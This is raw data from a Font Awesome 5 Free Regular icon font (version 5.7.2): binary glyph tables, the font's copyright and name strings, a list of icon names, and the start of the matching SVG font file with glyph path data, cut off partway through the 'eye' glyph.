���VT"(� 6  )K-;(!9 ����h)A'%
�+`	
��	����
%6&?6764&"2"&4264&"\B�B9ZΑ�Α��uu�u>�B�\�Α���u�uu�����
&732/&6%#!"&5463!24#!"3!2}�ccK��`0��T�cc���`��T������
&%#"&?67#!"&5463!24#!"3!2C�ccu��`0��T�cc�`��T������
&7546&#!"&5463!24#!"3!2�cc��`0��T]�cc��`��T������#!"&546;2'!#"&=#r���.L� h
�^���rLL�� 
h����),5%+"=4;22+"=43%#!"&546;2'3#"&=# ������T�Lh
��T����T<L�� 
h�`����.T\%#*#".#+"&=46;>7>3232>'2654&+4654.#+2;2'>4&"2�3&-E/@

c
-3	$(Kh	
m&%@

���!$*

�
 #	:/45'N)
9

G%�&B"U����.6[%+#".'.'#+"&=46;232>3:32264&"2>54&#6&'6&'6+"#322>54&5�2$$	3-0

@

@	.G-88�]b



@%&m"(�"454/:?	
�
3,$h	
)"B&�#6G

9���(8@H%/"/&?'&4?'&6762767'7''77&2"&4264&"�<G(
+(G<<G(,(G5MM[44[MM[44[�V==V=Q.!!.!�+)G<<F)+)G<<G54[MM[44\MM�=V==Vc!.!!.����&"&463276"3267&5467&j��j	%a>!"$h;VzzV0UT�2*@�Ԗ#(
>$?P9-2�z�z)$mU2T����
&/&?67#!"&5463!24#!"3!2cc���`0��T#�ccE��`��T������"264$2"&42"&4S�uu�u��Α�Α�B//B/�u�uu���Α��/B//B����#/;GYe54;2+"3"=4;2#"=4;2#3"=4;2#+"=4;2"=4;2#!54;463!232%354;23%�((�(�(X(t((L(��@
P
��p(p��,((((`((((T(4((|$$�

�HCC�����7=DJQ#!"&546;2'!#"&=##"''&76767&766>77"6467&'6&7r���.L� h
��

6'.
$
3�N-

x^���rLL�� 
h��D
.0*[�"�
#����R#!"&546;2'!#"&=#32+"'&/+"'.'&6;2476;21676r���.L� h
��


	


	
^���rLL�� 
h�&b		+	H		78	
`b		aa
����B#!"&546;2'!#"&=#2+"'&'+"&?'&6;26763r���.L� h
��#...		^���rLL�� 
h�=N7NN($����6>#!"&546;2'!#"&=#54;2*#+"73264&+r���.L� h
�HE#	
0

^���rLL�� 
h���%
/c����(0#!"&546;2'!#"&=#57676&2"&4r���.L� h
� ((X�((^���rLL�� 
h��@((X��((
����!$1@LP3#7#53#3#57#!"&546;23#"&=##5#7#"&?53322654."7#5�  @    @ ����Lh
0 P�
 
-		@   �      ���&L�� 
h�`�W'a  �

�  ����/=#!"&546;2'!#"&=#/#"&=46;7664'&>.r���.L� h
��$$)
	^���rLL�� 
h��$8$Y

:����7#!"&546;2'!#"&=#6/+"&=46;2r���.L� h
��5hh^���rLL�� 
h�p4%h%����$'0<M7#"/&?67#!"&546;23#"&=#7/&?6&?6/5&?�99!����Lh
��	7		7!99!c66����&L�� 
h�`�	�		�O66����$+"&46227''64&"264''&"67&7gΑ�Α��/p/522�/B//B�5/p/522�58�Α��D5UB//B//p/522�5/p/522�����!6#"/&='.77'76�2<
	p+) r�%%�;�`l���!�|.;T0<�2$��-�	����� '.5#"&'&676326767'7&'7'757/?'#� ^a&'O� ^a&'4_H:'G,4%=/@G�<&
G@]+G'%e:@,O+
b� ^Mb� *N�
*/%L=�4J/}45/J��>J%?4I0==	@�+/;GS_2#!"&546;>32=#!7"=4;2#'3554;2+"754;2+"=4;2+"54;2+"(

�!
+@�`=�lPx���hhhhhh�
��
!
���� ��x``P((��<������8@'&?63!"&54767>57"'675462'&5414&"&53z


��


��>��				.	|"&&%:!;B.&�


�


��0

	
*#D�

,B&7&/.B�`%����42"&4264&"#"&54>32'&#"3276�Α�Α��uu�u3)?=O$@(;&!$*$$
��Α���u�uu�)Q<'@%#	%"2�3K2#!"&5463254#!"37&546'&76&546'&76��`��l�R@AR@=�R@AR@>��� ����V6/.4"%6/.4"%	���+/37;Ocgo#32+"=!+"=4;#"=4;2!54;2'35!355#!5#'#"=!+32!543'2+"=#"=4;2'355#+�H��HH@H@ �@  � ��@�T���`8L@�HHHH@    ��    @���4�4pp�pL
��@�CGKOSgk���%#32+"=#+"=4;5#+"=4;5#"=4;2354;2+354;2'35355#5#354;5#"=#+325#%5#"=#32+"=#3235435#5#4H�HXHH�HXH�   ��   @��� 8XHX�4   �HHH�HHH�  �       ����  @�XH@    ����%#!"&5463!27#!3546;�T��`�LLP���
hdT`��L��h
���(42+#!"&546;54632=#"&=#"3%254#!"3�0��0��*������0@0�0*���`4������%+132#!"=4;467.5#"=43!2#!2654&"p2//2��2//2h��KjKKjK�?ss??ss?LllL�`LllL���)p6+"&5<&4&/&=46>62654&+"&=4&+"&=4&+"&=4&#"/&=4&354?6�$C	+
�
b'8#I$@:H							a�+q,(rd	!

U"49#,)(
�r

		

		(
)		

t	)

9U
d������Y6+"/&676546>654&+"&=4&+"&=4&+"&=4&/.376u.�
w!3 P4			

	
s�O)��
�7~!($%)!ф


L		�
�		�
�		�
�	&	�w��� ]"&7.7#"&463'.>6#'32?6=4/&#"/&+";2+";2#""(
X++^O8�+1b"wFFw	b
�
�
	��		

		

 6 
#+<+	88857'�%0�7@	;

			��@�A%#5'&+"&546;7#"&=463!254/&#!";2+";2-�d�!4$r�!/!&'v�
��
�	r�

c�$|H&!$40/!!!��L�
@	'�����(i7.7>'&67>767>2+"'&376=4?6&+"&?6."+"/.+"/./&5' /0 )  
�
	[|�

&

*


-*
#5B8�2"�i3 �%k

	�u`	
%�q������E2������^p��6+"/&676546266&;2?6=4&+"&=4&+".=4&+"&=4&'546;2+"&7546;2+"&754;2+"f!9%�"m!'7'!-��m	�			DL		K
(#Tw�7�''J
w

�wT

	

	#

#	�

�	R`		`	`		`		``������#^6+"/&7'&676'462654&+"&=4&+"&=4&+"/.;2?6j(%�'758%	+<+#0			

;@7�#Fw"b1+�8O^++X�F

		

		��	
��
b	w����,52"&4264&"+"/#+"&=46;2'254.+�Α�Α��uu�u6+0 'Of(: ��Α���u�uu�#ZT�U3)!

@����;C%++"=#"=4;54;2327#!"&546;54;2354;232!3!2PLLLLp��0(�(00��T�LLLL���`4444��*������+37"=4;2#7#!"&546;54;2354;232!3!2|�|��0(�(00��Tx��`4444��*������;C%//&?'&?6767#!"&546;54;2354;232!3!28	66	66	66	66���0(�(00��TI66	66	66	66���`4444��*������'72#!"&546;54;2354;225!3%/&?676���0(�(*���	K			,o		���`4444�p*��Ɏ	K	-n			��@�!%*/2#"/#"&54>?6327673#0

�



��

�



����������	��
5=?	Z
5=?:��.��/,�!/�����*2+#"=#"&54634&#!";?326�&&�}`&&�	��		�C
�	�&��&^T& &�� 		��	<2
	����/2"&4264&"%+"&=46;2+"&=46;2�Α�Α��uu�u(	0		0	p	0		0	��Α���u�uu���		�		�		�		����"&462264&"+"&=46;2��Α���u�uu��	�		�	'Α�Α��uu�ux�		�		����#+Lfn3#"&5#'#"'&/#+376;2264&"6/&'&6?#"##36???5#'&+"6?6264&"y@
:#;U			@v0��Q			�l	-	'9>*a!
%		�-=TA7
gn			@�

 	L		0��

		
W	;#>�X

 
$I�><3
S0

		
���5`#!"&54767>254'&'"."#3!2'#".'&'&?6232>7676��`(_dQ4/V� 
7
7
	7

7	��!K
	O���B)
	%F��
-

-
	,


,	����'+3H#32+32+#!"&5463!232!6"&462"&=463232632#���@P���4&&4&�	
''
	 @(@(0�0(����`�&4&&4�""��@�0<HT2#!"&5463!6"&462"&=463232632#7"=4;2#'"=4;2#'"=4;2#� � �4&&4&�	
''
	>ppppp���`�p`���&4&&4�""@@@����"42"&4264&"&2"&427&'#"'%654&"6322632�P88P8L((7Α�Α��8.-%%u�u%)@%$%@X8P88PX((ԑΑ���0&

'$4@SuuS@44

����'<2#!"&5463!"&46;2#"&462"&=463232632#P�� ��`		`		4&&4&�	
''
	��`��0��``				�&4&&4�""��@�$0<HP2#!"&5463!3&54632326327"=4;2#'"=4;2#'"=4;2#"&462� � !''9ppppp�4&&4&���`�p ��""P@@`&4&&4���2#!"&54635!3!2��`��`����`�v���� !"&463!2�@

�
 ���&2+#!"&546;54635!%!32�0��0��������0@0�0��`@0��������%/&//+"&=/&4?5/.?&/&?'.?>7'&/&6?'&?6'&6?65'&?6546;276?>76/76�'	H;		:H	'
'"PHHP"''	H:		:H	(
'"PHHP"]"Q*T;.		.<T*Q#	**	"Q*T;.		.<T*Q#	**	����08<H%"=4;2#2+#!"&5#"&=46;7>;2'3'&+"!7"=4;2#�		��		R"d"��^��L ��P		��P		9	9�`P��0����@�$4<G%#!"&546;#"3!2=!"3!2=452#!"&5463"&4627676!���
tZ��t��x""1((hH�� 0�
P��0�_""�((hHP����12#!"&546;462&"2644++"=#"3!2P��P&4&6x*�*���`&&�lT$$������"2"&4264&"74;232/&6;�Α�Α��uu�u�(CddC��Α���u�uu��tdd����"6462"$4&"27+/&?632�Α��/u�uu�-tddtYΑ�Α��uu�u�(CddC����""&462264&"54;546&=#"��Α���u�uu�-tddt'Α�Α��uu�u�(CddC����""&462"264#"=#"&?6+gΑ�Α��uu�u�(CddC8�Α��/u�uu��tddt����C�!$2"'&?63#3%3'#37'377#�d����dM94D��4�4�?D4dxD3aax4����U�0``````�������%5E2"&454+54+"327#";22#!"&54635"&5!#2!46P88P8�@�

��

0%�`%%�%0B\BB\fX
7
��

@
��%%�%%���72#!"&54634#!"3!2'//&?'&?676��`��l�l==			==			==			==		���`�vT���==			==			==			==		�����+>62"&462"&462"&4&2#"'#"&7>7&54264&"6?����Ԗ�j/.AJ
5Vzz�z(
&��z�z.%8FV�^�^^B3*

����'92"&4264&"$"'&>276&"&46272/&"&7>�Α�Α��uu�u6/�/!f!��%
&	��Α���u�uu�$
99
''A)				
���� 3H2"&4264&"62&'&".?"&547'.>6"&5"'&>?6�Α�Α��uu�u�j">'	

P	
�
	P
��Α���u�uu�)
q

	

@	

	����+GO2"&4264&"6"/"&4?'&4627626"/"&4?'&462762"&4�Α�Α��uu�u���4&&4&��Α���u�uu�kL�&4&&4	����'/7?K2"&4264&"$2"&4264&"62"&4&"&462264&"62"&42+"&463�Α�Α��uu�uB//B/<((&X/B//B5((&�

�

��Α���u�uu��/B//BQ((,B//B/�((,�����-2"&4264&"6"&46:"&42'&"&76�Α�Α��uu�u��N<=
	141	
��Α���u�uu��]"		
����/6=AEIMT[2"&4264&"6"&462"&4622+"&=4635#375#"5#75#5#75#5#326=4&+�Α�Α��uu�u���(		h000p000h(		��Α���u�uu�c#  `	(	((((		����'/2"&4264&"%6#".'&62&"&462"&462�Α�Α��uu�u2M)6()�����Α���u�uu�"
".&

N����
#+97"'&'6762"'&'6762&2"&4264&"%6"&'&62�q�Α�Α��uu�u2MRM)��		""		""		""		""ڑΑ���u�uu�"
".."

����4E2"&4264&"%6#".'&62'&7>32/&"7&7>2/&"�Α�Α��uu�u2M)6()��#
	
&
	�#&#
	
&
	��Α���u�uu�"
".&

V)))����
+EZ"&5476".'&62766/&"'&7>27"&4632&#"2654'2$"'&7>32/�,..�6')�)M`
	
&
	#&#d�Α�gC:2:Suu�u��&
	#
	 "EE��%


".�)),%(g��Α" u�uuS!)����
4<D%6"&'&62/.7>7>7/&67676&2"&4264&"bMRM)�pF�F	
�Α�Α��uu�u�
".."

>
FDF	
��Α���u�uu�����,:2"&4264&"%6#".'&62.?'&63'&4?6�Α�Α��uu�u2M)6()��
!!PP�PP	!!
��Α���u�uu�"
".&

/((0000((�����/;JYh76"&4767&67632&#"%67#"'67327>'&76762+&/.?"'&?6367>'&676u/")7Hg<5/6S:.{$9Ig30)-S:1C/"��
	
4

Z4	

4

&.:T&@R"/6D�6I;-�E�9I;0�TR"/s
Z	
4Z	
4p/%T:����6P2"&4264&"%6"&'&62'7'&6?62/&%/&?'&6?62�Α�Α��uu�u2MRM)��#
##
��Α���u�uu�"
".."

G#		#N	##	������%5CTi76"&476"'&'&6"&'6726%&>2&.""&'&62766/&"'&7>2&"'&7>32/u/"M"/Rl#l~l#_r_��'Em~mE&p�p�RM)�)
	
&
	#&#�&
	#
	�R"//"RP 2;;2 1;;�>f;;f?	H``�."


"|))")����;CK2"&45'&"/.32>>54&"&=&'&6276&2"&462"&4�Α�Α8%1;u�u;1)�)����Α��,		+'_9SuuS9_,


,�����;HU2"&45'&"/.32>>54&"&=&'&6276/&4?&?'&6�Α�Α8%1;u�u;1)�)!!
	PP�P	
!!��Α��,		+'_9SuuS9_,


,((0000((����!)1Ge2/&"&7>2"&4264&"62"&4&2"&45'&"/.32>>54&"&=&'&6276�

&
%�B//B/<((&�Α�Α8%1;u�u;1)�)
					4/B//BQ((,��Α��,		+'_9SuuS9_,


,����%-52/&"&76"&4626"&'&622"&4264&"4(%
&
Z�MRM)��Α�Α��uu�u						$T
".."

6�Α���u�uu�����)19A2"&4#"'&?64/&4?64/&762"&4264&"$2"&4��##)�Α�Α��uu�uq				%�Α���u�uu������#EU2/&"&7>&2"&4264&"%#"'&?64/&4?64/&7662/&"&76�#
&
	
Α�Α��uu�u##)&#
&
	
()��Α���u�uu�				�)����!4<Ol%#"'&?64/&4?64/&7637&"&7>32'&462"/&>7676#"&4632&#&'654&"320##)F&

%�ZS
�/4g��gg�
u�uuS-�					L

		�!	S	1(�Α�g.,
 Suu�u����-2"&464&"6"&462"&4622+"&'&63�Α�ΑKuu�uu���E..E��Α���u�uu�u�S	-<<-	����/=2"&464&"2/&"&76&7>2/&"2+"&'&63�Α�ΑKuu�uu�&#
&
	
�
#&#	
&
�E..E��Α���u�uu�u0)#))M	-<<-	����)72"&464&"/&4?6&?'&62+"&'&63�Α�ΑKuu�uu�!PP�	
!!P�E..E��Α���u�uu�u(00b((0R	-<<-	����!)72"&464&"2/&"&7>"&4622+"&'&63�Α�ΑKuu�uu�
&	l�E..E��Α���u�uu�u$
				2S	-<<-	����2"&4264&"62"&462"&4�Α�Α��uu�uk���Α���u�uu������)1CO2"&4264&"$2"&42654'"&547&"&4622654'"&5472+"&463�Α�Α��uu�u<**<*7"@*<**<F"�

�

��Α���u�uu��*<**<F

/<**<*H

�����!3CK2"&4654&"5462275462&/&"&7>3262/&"&762"&4�Α�Α�8u�u8-f-�	&

%p(%
&
>.!!.!��Α���:PSuuSP:r

��

2						
*				D&4&&4����&.92"&4264&"72&'&#"&46&"&46262"&46"&54�Α�Α��uu�u�<&&
As�$"��Α���u�uu�#.@-P1����4E2"&4264&"%>"'&>2''&7>32/&"62/&"'&76�Α�Α��uu�u/�/!f�	#
	
&�&#
	
&
	��Α���u�uu�
99
'�)%)����'2"&4264&"62"&46"&46:"&4�Α�Α��uu�u�4&&4&���Α���u�uu�;&4&&4{����)82"&4264&"$/&4?&?'&62'&".76�Α�Α��uu�uC
!!
	PP�P	
!!PHC
#r#��Α���u�uu��((0030((0J6'	
'V6��![%�
,��+O���	4	6Q	�	B�	6#	Jw	0�	
X4	.�	&	?	6W	&�	�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free RegularFont Awesome 5 Free RegularRegularRegularFont Awesome 5 Free Regular-5.7.2Font Awesome 5 Free Regular-5.7.2Font Awesome 5 Free RegularFont Awesome 5 Free Regular329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Free-RegularFontAwesome5Free-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeRegularRegularFont Awesome 5 Free RegularFont Awesome 5 Free RegularFont Awesome 5 FreeFont Awesome 5 FreeRegularRegular���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ�KLMNOPQRSTUVW�XYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������heartstaruserclocklist-altflagbookmarkimageedittimes-circlecheck-circlequestion-circleeye	eye-slashcalendar-altcommentfolderfolder-open	chart-barcomments	star-halflemoncredit-cardhddhand-point-righthand-point-left
hand-point-uphand-point-downcopysavesquareenvelope	lightbulbbellhospitalplus-squarecirclesmilefrownmehkeyboardcalendarplay-circleminus-squarecheck-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-rightfilefile-alt	thumbs-upthumbs-downsunmooncaret-square-left
dot-circlebuildingfile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringpaper-planefutbol	newspaper
bell-slashclosed-captioningobject-groupobject-ungroupsticky-noteclone	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peace
calendar-pluscalendar-minuscalendar-timescalendar-checkmapcomment-altpause-circlestop-circle	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardwindow-maximizewindow-minimizewindow-restore	snowflake	trash-altimages	clipboardarrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upgemmoney-bill-altwindow-closecomment-dots
smile-winkangrydizzyflushed
frown-opengrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-wink	meh-blankmeh-rolling-eyessad-crysad-tear
smile-beamsurprisetired����`)l؈��؈��PK!91���3�3'fontawesome/webfonts/fa-regular-400.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<metadata>
Created by FontForge 20190112 at Tue Feb 12 10:24:59 2019
 By Robert Madole
Copyright (c) Font Awesome
</metadata>
<defs>
<font id="FontAwesome5Free-Regular" horiz-adv-x="512" >
  <font-face 
    font-family="Font Awesome 5 Free Regular"
    font-weight="400"
    font-stretch="normal"
    units-per-em="512"
    panose-1="2 0 5 3 0 0 0 0 0 0"
    ascent="448"
    descent="-64"
    bbox="-0.0663408 -64.0662 640.01 448.1"
    underline-thickness="25"
    underline-position="-51"
    unicode-range="U+0020-F5C8"
  />
    <missing-glyph />
    <glyph glyph-name="heart" unicode="&#xf004;" 
d="M458.4 383.7c75.2998 -63.4004 64.0996 -166.601 10.5996 -221.3l-175.4 -178.7c-10 -10.2002 -23.2998 -15.7998 -37.5996 -15.7998c-14.2002 0 -27.5996 5.69922 -37.5996 15.8994l-175.4 178.7c-53.5996 54.7002 -64.5996 157.9 10.5996 221.2
c57.8008 48.7002 147.101 41.2998 202.4 -15c55.2998 56.2998 144.6 63.5996 202.4 15zM434.8 196.2c36.2002 36.8994 43.7998 107.7 -7.2998 150.8c-38.7002 32.5996 -98.7002 27.9004 -136.5 -10.5996l-35 -35.7002l-35 35.7002
c-37.5996 38.2998 -97.5996 43.1992 -136.5 10.5c-51.2002 -43.1006 -43.7998 -113.5 -7.2998 -150.7l175.399 -178.7c2.40039 -2.40039 4.40039 -2.40039 6.80078 0z" />
    <glyph glyph-name="star" unicode="&#xf005;" horiz-adv-x="576" 
d="M528.1 276.5c26.2002 -3.7998 36.7002 -36.0996 17.7002 -54.5996l-105.7 -103l25 -145.5c4.5 -26.3008 -23.1992 -45.9004 -46.3994 -33.7002l-130.7 68.7002l-130.7 -68.7002c-23.2002 -12.2998 -50.8994 7.39941 -46.3994 33.7002l25 145.5l-105.7 103
c-19 18.5 -8.5 50.7998 17.7002 54.5996l146.1 21.2998l65.2998 132.4c11.7998 23.8994 45.7002 23.5996 57.4004 0l65.2998 -132.4zM388.6 135.7l100.601 98l-139 20.2002l-62.2002 126l-62.2002 -126l-139 -20.2002l100.601 -98l-23.7002 -138.4l124.3 65.2998
l124.3 -65.2998z" />
    <glyph glyph-name="user" unicode="&#xf007;" horiz-adv-x="448" 
d="M313.6 144c74.2002 0 134.4 -60.2002 134.4 -134.4v-25.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v25.5996c0 74.2002 60.2002 134.4 134.4 134.4c28.7998 0 42.5 -16 89.5996 -16s60.9004 16 89.5996 16zM400 -16v25.5996
c0 47.6006 -38.7998 86.4004 -86.4004 86.4004c-14.6992 0 -37.8994 -16 -89.5996 -16c-51.2998 0 -75 16 -89.5996 16c-47.6006 0 -86.4004 -38.7998 -86.4004 -86.4004v-25.5996h352zM224 160c-79.5 0 -144 64.5 -144 144s64.5 144 144 144s144 -64.5 144 -144
s-64.5 -144 -144 -144zM224 400c-52.9004 0 -96 -43.0996 -96 -96s43.0996 -96 96 -96s96 43.0996 96 96s-43.0996 96 -96 96z" />
    <glyph glyph-name="clock" unicode="&#xf017;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 -8c110.5 0 200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200zM317.8 96.4004l-84.8994 61.6992
c-3.10059 2.30078 -4.90039 5.90039 -4.90039 9.7002v164.2c0 6.59961 5.40039 12 12 12h32c6.59961 0 12 -5.40039 12 -12v-141.7l66.7998 -48.5996c5.40039 -3.90039 6.5 -11.4004 2.60059 -16.7998l-18.8008 -25.9004c-3.89941 -5.2998 -11.3994 -6.5 -16.7998 -2.59961z
" />
    <glyph glyph-name="list-alt" unicode="&#xf022;" 
d="M464 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h416zM458 16c3.31152 0 6 2.68848 6 6v340c0 3.31152 -2.68848 6 -6 6h-404c-3.31152 0 -6 -2.68848 -6 -6v-340
c0 -3.31152 2.68848 -6 6 -6h404zM416 108v-24c0 -6.62695 -5.37305 -12 -12 -12h-200c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h200c6.62695 0 12 -5.37305 12 -12zM416 204v-24c0 -6.62695 -5.37305 -12 -12 -12h-200c-6.62695 0 -12 5.37305 -12 12
v24c0 6.62695 5.37305 12 12 12h200c6.62695 0 12 -5.37305 12 -12zM416 300v-24c0 -6.62695 -5.37305 -12 -12 -12h-200c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h200c6.62695 0 12 -5.37305 12 -12zM164 288c0 -19.8818 -16.1182 -36 -36 -36
s-36 16.1182 -36 36s16.1182 36 36 36s36 -16.1182 36 -36zM164 192c0 -19.8818 -16.1182 -36 -36 -36s-36 16.1182 -36 36s16.1182 36 36 36s36 -16.1182 36 -36zM164 96c0 -19.8818 -16.1182 -36 -36 -36s-36 16.1182 -36 36s16.1182 36 36 36s36 -16.1182 36 -36z" />
    <glyph glyph-name="flag" unicode="&#xf024;" 
d="M336.174 368c35.4668 0 73.0195 12.6914 108.922 28.1797c31.6406 13.6514 66.9043 -9.65723 66.9043 -44.1162v-239.919c0 -16.1953 -8.1543 -31.3057 -21.7129 -40.1631c-26.5762 -17.3643 -70.0693 -39.9814 -128.548 -39.9814c-68.6084 0 -112.781 32 -161.913 32
c-56.5674 0 -89.957 -11.2803 -127.826 -28.5566v-83.4434c0 -8.83691 -7.16309 -16 -16 -16h-16c-8.83691 0 -16 7.16309 -16 16v406.438c-14.3428 8.2998 -24 23.7979 -24 41.5615c0 27.5693 23.2422 49.71 51.2012 47.8965
c22.9658 -1.49023 41.8662 -19.4717 44.4805 -42.3379c0.177734 -1.52441 0.321289 -4.00781 0.321289 -5.54199c0 -4.30176 -1.10352 -11.1035 -2.46289 -15.1846c22.418 8.68555 49.4199 15.168 80.7207 15.168c68.6084 0 112.781 -32 161.913 -32zM464 112v240
c-31.5059 -14.6338 -84.5547 -32 -127.826 -32c-59.9111 0 -101.968 32 -161.913 32c-41.4365 0 -80.4766 -16.5879 -102.261 -32v-232c31.4473 14.5967 84.4648 24 127.826 24c59.9111 0 101.968 -32 161.913 -32c41.4365 0 80.4775 16.5879 102.261 32z" />
    <glyph glyph-name="bookmark" unicode="&#xf02e;" horiz-adv-x="384" 
d="M336 448c26.5098 0 48 -21.4902 48 -48v-464l-192 112l-192 -112v464c0 26.5098 21.4902 48 48 48h288zM336 19.5703v374.434c0 3.31348 -2.68555 5.99609 -6 5.99609h-276c-3.31152 0 -6 -2.68848 -6 -6v-374.43l144 84z" />
    <glyph glyph-name="image" unicode="&#xf03e;" 
d="M464 384c26.5098 0 48 -21.4902 48 -48v-288c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h416zM458 48c3.31152 0 6 2.68848 6 6v276c0 3.31152 -2.68848 6 -6 6h-404c-3.31152 0 -6 -2.68848 -6 -6v-276
c0 -3.31152 2.68848 -6 6 -6h404zM128 296c22.0908 0 40 -17.9092 40 -40s-17.9092 -40 -40 -40s-40 17.9092 -40 40s17.9092 40 40 40zM96 96v48l39.5137 39.5146c4.6875 4.68652 12.2852 4.68652 16.9717 0l39.5146 -39.5146l119.514 119.515
c4.6875 4.68652 12.2852 4.68652 16.9717 0l87.5146 -87.5146v-80h-320z" />
    <glyph glyph-name="edit" unicode="&#xf044;" horiz-adv-x="575" 
d="M402.3 103.1l32 32c5 5 13.7002 1.5 13.7002 -5.69922v-145.4c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h273.5c7.09961 0 10.7002 -8.59961 5.7002 -13.7002l-32 -32c-1.5 -1.5 -3.5 -2.2998 -5.7002 -2.2998h-241.5v-352h352
v113.5c0 2.09961 0.799805 4.09961 2.2998 5.59961zM558.9 304.9l-262.601 -262.601l-90.3994 -10c-26.2002 -2.89941 -48.5 19.2002 -45.6006 45.6006l10 90.3994l262.601 262.601c22.8994 22.8994 59.8994 22.8994 82.6992 0l43.2002 -43.2002
c22.9004 -22.9004 22.9004 -60 0.100586 -82.7998zM460.1 274l-58.0996 58.0996l-185.8 -185.899l-7.2998 -65.2998l65.2998 7.2998zM524.9 353.7l-43.2002 43.2002c-4.10059 4.09961 -10.7998 4.09961 -14.7998 0l-30.9004 -30.9004l58.0996 -58.0996l30.9004 30.8994
c4 4.2002 4 10.7998 -0.0996094 14.9004z" />
    <glyph glyph-name="times-circle" unicode="&#xf057;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 -8c110.5 0 200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200zM357.8 254.2l-62.2002 -62.2002l62.2002 -62.2002
c4.7002 -4.7002 4.7002 -12.2998 0 -17l-22.5996 -22.5996c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-62.2002 62.2002l-62.2002 -62.2002c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-22.5996 22.5996c-4.7002 4.7002 -4.7002 12.2998 0 17l62.2002 62.2002l-62.2002 62.2002
c-4.7002 4.7002 -4.7002 12.2998 0 17l22.5996 22.5996c4.7002 4.7002 12.2998 4.7002 17 0l62.2002 -62.2002l62.2002 62.2002c4.7002 4.7002 12.2998 4.7002 17 0l22.5996 -22.5996c4.7002 -4.7002 4.7002 -12.2998 0 -17z" />
    <glyph glyph-name="check-circle" unicode="&#xf058;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM256 392c-110.549 0 -200 -89.4678 -200 -200c0 -110.549 89.4678 -200 200 -200c110.549 0 200 89.4678 200 200c0 110.549 -89.4678 200 -200 200z
M396.204 261.733c4.66699 -4.70508 4.63672 -12.3037 -0.0673828 -16.9717l-172.589 -171.204c-4.70508 -4.66797 -12.3027 -4.63672 -16.9697 0.0683594l-90.7812 91.5156c-4.66797 4.70605 -4.63672 12.3047 0.0683594 16.9717l22.7188 22.5361
c4.70508 4.66699 12.3027 4.63574 16.9697 -0.0693359l59.792 -60.2773l141.353 140.216c4.70508 4.66797 12.3027 4.6377 16.9697 -0.0673828z" />
    <glyph glyph-name="question-circle" unicode="&#xf059;" 
d="M256 440c136.957 0 248 -111.083 248 -248c0 -136.997 -111.043 -248 -248 -248s-248 111.003 -248 248c0 136.917 111.043 248 248 248zM256 -8c110.569 0 200 89.4697 200 200c0 110.529 -89.5088 200 -200 200c-110.528 0 -200 -89.5049 -200 -200
c0 -110.569 89.4678 -200 200 -200zM363.244 247.2c0 -67.0518 -72.4209 -68.084 -72.4209 -92.8633v-6.33691c0 -6.62695 -5.37305 -12 -12 -12h-45.6475c-6.62695 0 -12 5.37305 -12 12v8.65918c0 35.7451 27.1006 50.0342 47.5791 61.5156
c17.5615 9.84473 28.3242 16.541 28.3242 29.5791c0 17.2461 -21.999 28.6934 -39.7842 28.6934c-23.1885 0 -33.8936 -10.9775 -48.9424 -29.9697c-4.05664 -5.11914 -11.46 -6.07031 -16.666 -2.12402l-27.8232 21.0986
c-5.10742 3.87207 -6.25098 11.0654 -2.64453 16.3633c23.627 34.6934 53.7217 54.1846 100.575 54.1846c49.0713 0 101.45 -38.3037 101.45 -88.7998zM298 80c0 -23.1592 -18.8408 -42 -42 -42s-42 18.8408 -42 42s18.8408 42 42 42s42 -18.8408 42 -42z" />
    <glyph glyph-name="eye" unicode="&#xf06e;" horiz-adv-x="576" 
d="M288 304c0.0927734 0 0.244141 0.000976562 0.336914 0.000976562c61.6641 0 111.71 -50.0469 111.71 -111.711c0 -61.6631 -50.0459 -111.71 -111.71 -111.71s-111.71 50.0469 -111.71 111.71c0 8.71289 1.95898 22.5781 4.37305 30.9502
